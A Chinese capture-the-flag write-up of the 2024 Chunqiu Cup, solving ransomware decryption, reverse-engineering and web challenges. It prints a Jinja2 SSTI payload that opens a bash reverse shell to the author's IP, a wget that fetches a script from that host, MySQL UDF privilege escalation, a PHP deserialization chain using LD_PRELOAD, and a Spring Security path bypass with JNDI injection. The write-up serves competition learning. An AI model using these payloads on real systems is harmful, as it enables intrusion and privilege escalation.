2024 春秋杯

花点时间看了点题目，还是很好玩的。最后有点事情出去了，AWDP 最后一题没看，回头空了再看看。

初探勒索病毒

按照要求复现即可

image-20240705192800301

运行三条命令

# Patch the bundled decryptor so it parses: the bare identifier `flags` is wrapped in quotes.
# No `g` flag, so only the first `flags` on each line is rewritten -- if the script still
# fails to run, diff the file and check whether a second occurrence was missed.
sed -i 's/flags/"flags"/' ./decryptblocks.py
# Judging by its name this tells the decryptor to skip its file-magic check on the encrypted
# input; the decryptor's source is not shown on this page, so treat that as an assumption.
export SRL_IGNORE_MAGIC=1
# Decrypt the ransomed file (banana.jpg carrying the ransomware's .sah28vut5 suffix) with the
# recovered key block. The next step copies the result and restores the .jpg suffix.
./decryptblocks.py ./banana.jpg.sah28vut5 ./key.block

用 cp 复制一份并把后缀改回 .jpg，打开图片即可得到 flag。

image-20240705194212886

brother

一眼ssti注入

image-20240705194449321

随便找一个 payload 弹个 shell 出来看看（下面 payload 里的 111.229.202.164:1145 是作者自己的监听地址，复现时要换成自己的 IP 和端口）：

{%for(x)in().__class__.__base__.__subclasses__()%}{%if%27war%27in(x).__name__%20%}{{x()._module.__builtins__[%27__import__%27](%27os%27).popen(%27bash -c 'bash -i >& /dev/tcp/111.229.202.164/1145 0>%261'%27).read()}}{%endif%}{%endfor%}

成功弹上shell

随便逛逛 注意到有api.py

image-20240705200915252

注意到给了sql账号密码

# MySQL connection settings hard-coded in api.py on the target: a local instance on the
# non-default port 6666, reachable with the `ctf` account whose password is in clear text.
config = dict(
    user='ctf',
    password='123456',
    host='127.0.0.1',
    database='mysql',
    port=6666,
)

用这组凭据登录 MySQL（实例只监听在本机，端口是非标准的 6666）：

# Connect over TCP to the local MySQL on the non-default port 6666 with the api.py credentials.
# `-p` with no value makes the client prompt for the password (123456) instead of exposing
# it in the process list and shell history.
mysql -h 127.0.0.1 -P 6666 -u ctf -p

下载 UDF 提权所需的 sh 脚本，其内容大致就是下面这条把 so 写入 MySQL 插件目录的命令（so 的字节内容此处省略）：

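# Drop the UDF shared object into MySQL's plugin directory via SELECT ... INTO DUMPFILE.
# `-h 127.0.0.1` is required: with no host the client targets "localhost", which on Unix
# means the socket file, and `-P 6666` is then silently ignored -- the same flags the other
# mysql invocations on this page use. Preconditions a practitioner should confirm first:
# the ctf account needs the FILE privilege, secure_file_priv must not forbid writes to the
# plugin dir, and the path should match SELECT @@plugin_dir. {省略so文件内容} stands for the
# .so bytes, typically supplied as a 0x... hex literal. Note `-p123456` puts the password
# in the process list; acceptable in a CTF box, not elsewhere.
mysql -h 127.0.0.1 -P 6666 -u ctf -p123456 -e "SELECT {省略so文件内容} INTO DUMPFILE '/usr/lib/mysql/plugin/udf.so';"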

目标机器上没有 curl，但有 wget：

# The target has no curl, so fetch the helper script from the attacker-controlled host with
# wget. 111.229.202.164:8080 is the author's own box -- substitute your own web server.
wget http://111.229.202.164:8080/1.sh

进行 UDF 提权。注意 so 写入插件目录后，还要用 CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.so' 把函数注册进 MySQL，下面的 sys_eval 才能调用。

image-20240705210234037

成功写入

# Run `cat /flag` through the UDF. sys_eval exists only after the dropped udf.so has been
# registered (CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.so'); that step is not
# shown on the page, so confirm it ran before this. The command executes as the mysqld
# service user, which is what gives the privilege escalation.
mysql -h 127.0.0.1 -P 6666 -u ctf -p -e "select sys_eval('cat /flag');"

image-20240705210528987

image-20240705210901798

得到flag

Hijack

<?php
/**
 * Stand-in for the target's ENV class, used only to produce the serialized payload.
 * Only the property names and their declaration order matter to serialize().
 */
class ENV
{
    public $key, $value, $math;
}
/**
 * Stand-in for the target's DIFF class; mirrors its public properties in declaration
 * order so the serialized form matches what the target will unserialize.
 */
class DIFF
{
    public $callback, $back, $flag;
}
/**
 * Stand-in for the target's FILE class. The misspelling "enviroment" is deliberate:
 * the serialized property name has to match the target's declaration exactly.
 */
class FILE
{
    public $filename, $enviroment;
}
/**
 * Stand-in for the target's FUN class; declared so the alternative (commented-out)
 * gadget chain below can be serialized, though the final payload does not use it.
 */
class FUN
{
    public $fun, $value;
}
// Assemble the gadget chain from the inside out: ENV -> DIFF -> FILE -> ENV, where the
// innermost ENV carries key/value = LD_PRELOAD -> the .so previously dropped in /tmp.
$preload = new ENV();
$preload->key = "LD_PRELOAD";
$preload->value = "/tmp/2801468f13fd0791a6ccd9d73b87747e.so";

$holder = new FILE();
// Property is spelled "enviroment" to match FILE::$enviroment as declared above.
$holder->enviroment = $preload;

$diff = new DIFF();
$diff->flag = true;
$diff->callback = $holder;

$test = new ENV();
$test->math = $diff;
// Alternative chain, not used: callback = FUN whose ->fun is a FILE with
// filename "poc.so" and whose ->value holds the .so bytes.
echo(serialize($test));
?>

写入一个 so 文件，然后用 putenv 把 LD_PRELOAD 指向它即可。注意 LD_PRELOAD 只对 putenv 之后新启动的子进程生效，so 里的构造函数是在新进程加载时执行的，所以链子里还需要一个能拉起新进程的点。

这里写了个马进去

image-20240706152450213

snake

用 IDA 直接看，能看出是 Python 打包的程序，于是改用 pyc 提取/反编译工具来逆向。

image-20240706153756404

在线反编译一下。注意反编译结果并不完全准确：下面 S 表的交换被还原成了两条普通赋值，decrypt 里的 lambda 也是非法语法，后面按语义手动修正。

#!/usr/bin/env python
# visit https://tool.lu/pyc/ for more information
# Version: Python 3.8

import pygame
import random
import key

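def initialize(key):
    """RC4 key scheduling (KSA): return the 256-entry permutation S derived from `key`.

    `key` is a bytes object (any sequence of ints works); it is cycled when shorter
    than 256. The decompiler rendered the swap as two plain assignments
    (`S[i] = S[j]` then `S[j] = S[i]`), which overwrites an entry instead of swapping
    and would leave duplicates in S. Restored to a real swap, which is what the
    author's corrected solve script also uses.
    """
    key_length = len(key)
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % key_length]) % 256
        S[i], S[j] = S[j], S[i]
    return S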


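def generate_key_stream(S, length):
    """RC4 output generation (PRGA): return `length` keystream bytes as a list of ints.

    `S` is the permutation from initialize() and is permuted further in place as the
    stream is produced. As in initialize(), the decompiler emitted the swap as two
    overwriting assignments; restored to a real swap so the output matches stock RC4.
    """
    i = 0
    j = 0
    key_stream = []
    for _ in range(length):
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        key_stream.append(S[(S[i] + S[j]) % 256])
    return key_stream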


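def decrypt(data, key):
    """Decrypt `data` (bytes) with the modified RC4 keyed by `key`.

    Each output byte is data[i] XOR key_stream[i] XOR i -- the extra XOR with the
    byte index is the deviation from stock RC4. The decompiler emitted
    `None((lambda .0 = None: ...))` here, which is not valid Python; this is the
    intended expression. Because of the `^ i` term the result only stays within a
    byte for indices below 256, which holds for the 32-byte ciphertext in this binary.
    """
    S = initialize(key)
    key_stream = generate_key_stream(S, len(data))
    return bytes(i ^ data[i] ^ key_stream[i] for i in range(len(data)))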

# Game setup (decompiled; original indentation was lost, restored by reading the syntax).
pygame.init()
WINDOW_WIDTH = 800
WINDOW_HEIGHT = 600
SNAKE_SIZE = 20
SNAKE_SPEED = 20
WHITE = (255, 255, 255)
BLACK = (0, 0, 0)
RED = (255, 0, 0)
window = pygame.display.set_mode((WINDOW_WIDTH, WINDOW_HEIGHT))
pygame.display.set_caption('贪吃蛇')
font = pygame.font.Font(None, 36)
snake = [
    (200, 200),
    (210, 200),
    (220, 200)]
snake_direction = (SNAKE_SPEED, 0)
food = ((random.randint(0, WINDOW_WIDTH - SNAKE_SIZE) // SNAKE_SIZE) * SNAKE_SIZE, (random.randint(0, WINDOW_HEIGHT - SNAKE_SIZE) // SNAKE_SIZE) * SNAKE_SIZE)
# Decompiler artifact: `lambda .0:` is not valid Python. Intent is the byte values of
# key.xor_key (the string in key.py) -- equivalent to key.xor_key.encode() for ASCII.
key_bytes = bytes((lambda .0: [ ord(char) for char in .0 ])(key.xor_key))
# 32-byte ciphertext embedded in the binary; the flag is decrypt(data, key_bytes).
data = [
    101, 97, 39, 125, 218, 172, 205, 3,
    235, 195, 72, 125, 89, 130, 103, 213,
    120, 227, 193, 67, 174, 71, 162, 248,
    244, 12, 238, 92, 160, 203, 185, 155]
decrypted_data = decrypt(bytes(data), key_bytes)
running = True
# Decompiler artifact: the `continue` statements below only make sense inside a loop,
# so this was presumably `while running:`. Likewise the KEYDOWN test and the K_UP test
# were probably a nested if/elif rather than the `or` shown.
if running:
    window.fill(BLACK)
    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            running = False
        elif event.type == pygame.KEYDOWN or event.key == pygame.K_UP:
            snake_direction = (0, -SNAKE_SPEED)
        elif event.key == pygame.K_DOWN:
            snake_direction = (0, SNAKE_SPEED)
        elif event.key == pygame.K_LEFT:
            snake_direction = (-SNAKE_SPEED, 0)
        elif event.key == pygame.K_RIGHT:
            snake_direction = (SNAKE_SPEED, 0)
        continue
    snake_head = (snake[0][0] + snake_direction[0], snake[0][1] + snake_direction[1])
    snake.insert(0, snake_head)
    snake.pop()
    if snake[0] == food:
        food = ((random.randint(0, WINDOW_WIDTH - SNAKE_SIZE) // SNAKE_SIZE) * SNAKE_SIZE, (random.randint(0, WINDOW_HEIGHT - SNAKE_SIZE) // SNAKE_SIZE) * SNAKE_SIZE)
        snake.append(snake[-1])
    # Wall check as decompiled uses `and` between mutually exclusive bounds, so only the
    # self-collision test can actually end the game; likely an `or` chain originally.
    if snake[0][0] < 0 and snake[0][0] >= WINDOW_WIDTH and snake[0][1] < 0 and snake[0][1] >= WINDOW_HEIGHT or snake[0] in snake[1:]:
        running = False
    for segment in snake:
        pygame.draw.rect(window, WHITE, (segment[0], segment[1], SNAKE_SIZE, SNAKE_SIZE))
    pygame.draw.rect(window, RED, (food[0], food[1], SNAKE_SIZE, SNAKE_SIZE))
    score_text = font.render(f'''Score: {len(snake)}''', True, WHITE)
    speed_text = font.render(f'''Speed: {SNAKE_SPEED}''', True, WHITE)
    window.blit(score_text, (10, 10))
    window.blit(speed_text, (10, 40))
    score = len(snake)
    # The flag is only drawn at a score of 9999, i.e. never in practice -- hence the
    # offline decryption in the solve script instead of playing the game.
    if score >= 9999:
        flag_text = font.render('Flag: ' + decrypted_data.decode(), True, WHITE)
        window.blit(flag_text, (10, 70))
    pygame.display.update()
    pygame.time.Clock().tick(10)
    continue
pygame.quit()

key在key.py里面

# uncompyle6 version 3.9.1
# Python bytecode version base 3.8.0 (3413)
# Decompiled from: Python 3.6.12 (default, Feb 9 2021, 09:19:15)
# [GCC 8.3.0]
# Embedded file name: key.py
# Key string read by the game as key.xor_key; the solve script hard-codes the same value.
xor_key = 'V3rY_v3Ry_Ez'

RC4 被魔改了：解密时每个字节除了异或密钥流，还多异或了一个下标 i（见 decrypt 中的 i ^ data[i] ^ key_stream[i]）。把反编译结果按此修正后直接跑：

def initialize(key):
    """RC4 key scheduling: build the initial 256-entry S-box from `key`.

    `key` is a bytes-like object whose bytes are cycled if it is shorter than 256.
    Returns the permuted list; generate_key_stream() later mutates it in place.
    """
    sbox = list(range(256))
    klen = len(key)
    swap_with = 0
    for idx in range(256):
        swap_with = (swap_with + sbox[idx] + key[idx % klen]) % 256
        sbox[idx], sbox[swap_with] = sbox[swap_with], sbox[idx]
    return sbox
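def generate_key_stream(S, length):
    """RC4 output generation (PRGA): return `length` keystream bytes as a list of ints.

    `S` is the permutation from initialize() and is permuted further in place.
    The original had `i = 0 j = 0` jammed onto one line, which is a SyntaxError;
    split into two assignments. Otherwise stock RC4.
    """
    i = 0
    j = 0
    key_stream = []
    for _ in range(length):
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        key_stream.append(S[(S[i] + S[j]) % 256])
    return key_stream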
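def decrypt(data, key):
    """Decrypt `data` (bytes) with the modified RC4 keyed by `key`.

    Output byte i is data[i] ^ key_stream[i] ^ i; the extra XOR with the index is
    the challenge's tweak on RC4. The original wrapped this in an immediately-invoked
    lambda with a spurious `ii = bytes` default; a plain generator says the same thing.
    Valid only while len(data) <= 256, since `^ i` must stay within a byte.
    """
    S = initialize(key)
    key_stream = generate_key_stream(S, len(data))
    return bytes(i ^ data[i] ^ key_stream[i] for i in range(len(data)))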

# Key recovered from key.py and the 32-byte ciphertext lifted from the decompiled binary.
key = "V3rY_v3Ry_Ez"
key_bytes = key.encode()  # identical to bytes([ord(c) for c in key]); the key is ASCII
data = [
    101, 97, 39, 125, 218, 172, 205, 3,
    235, 195, 72, 125, 89, 130, 103, 213,
    120, 227, 193, 67, 174, 71, 162, 248,
    244, 12, 238, 92, 160, 203, 185, 155,
]
decrypted_data = decrypt(bytes(data), key_bytes)
print(decrypted_data)

image-20240706155418407

simplegoods

fix

攻击方式应该是先上传文件再包含。修复时把包含的地方直接注释掉即可（若 check 要求功能保留，也可改为只允许包含固定白名单文件）。

image-20240706152738042

ezSpring

fix

主要攻击思路是 Spring Security 6.x 的权限绕过：请求 /admin/lookup/123%0d（路径末尾带 %0d）即可绕过鉴权访问 lookup 接口。

然后打 lookup：在 Java 17 等高版本下走 JNDI 注入，配合 Jackson 反序列化链即可。

修复只要把 lookup 相关代码注释掉就行（同时建议修正 Spring Security 的路径匹配规则，否则绕过点仍然存在）。